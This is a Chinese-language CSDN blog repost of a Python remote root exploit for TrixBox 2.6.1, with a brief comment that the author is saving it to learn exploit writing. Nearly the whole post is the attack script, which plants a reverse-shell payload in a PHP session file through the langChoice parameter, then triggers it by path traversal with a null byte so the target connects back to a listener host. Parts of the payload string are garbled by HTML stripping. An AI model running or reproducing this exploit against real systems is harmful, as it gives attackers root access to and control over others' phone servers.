TrixBox 2.6.1 langChoice remote root exploit

最新推荐文章于 2024-06-14 02:02:23 发布

edwang133

最新推荐文章于 2024-06-14 02:02:23 发布

阅读量442

点赞数

分类专栏： TECH 文章标签： session output import python header socket

本文链接：https://blog.csdn.net/edwang133/article/details/2674840

版权

TECH 专栏收录该内容

8 篇文章 0 订阅

订阅专栏

# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# chris from offensive-security.com
# All credits to Jean-Michel BESNARD 
  
  
   
   
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6
# (disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 # i686 i386 GNU/Linux
################################################################################

import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!/r/n"
"[*] TrixBox 2.6.1 langChoice remote root exploit /r/n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt/r/n")

if (len(sys.argv)!=5):
	print "[*] Usage: %s 
   
    
    
     
     
      
      
      
       
       " % sys.argv[0]
	exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 /r/n"
        "Host: 192.168.219.132 /r/n"
        "Content-Type: application/x-www-form-urlencoded /r/n"
        "Content-Length: "+str(len(injection))+"/r/n/r/n" +injection)
        return buffer

def send_post(host,port,input):
	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send(input)
	output=s.recv(1024)
	s.close()
	return output

def find_sessionid(http_output):
	headers=re.split("/n",http_output)
	for header in headers:
	        if re.search("Set-Cookie",header):
           	    	cook=header.split(" ")
			sessionid=cook[1][10:42]
	                print "[*] Session ID is %s" % sessionid
			return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=
       
       %260 2>%260/");?>" 
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! /r/n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post(&apos;langChoice=../../../../../../../../../../tmp/sess_&apos;+id+&apos;%00&apos;)
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post(&apos;langChoice=english&apos;)
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

Trixbox是一个基于IP-PBX的VOIP语音电话系统，截止到6月13号发布的最新版本是2.6.1，官方网站是:http://www.trixbox.org. milw0rm上有人公布了一个remote root exploit，是用python语言所编写。由于最近12天我都在学python,所以看上去特别的亲切，收藏一下，方便以后自己写exp ：）

edwang133

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
TrixBox 2.6.1 langChoice remote root exploit

# TrixBox 2.6.1 langChoice remote root exploit# muts from offensive-security.com# chris from offensive-security.com# All credits to Jean-Michel BESNARD # Same same, but different.# http://ww
复制链接

扫一扫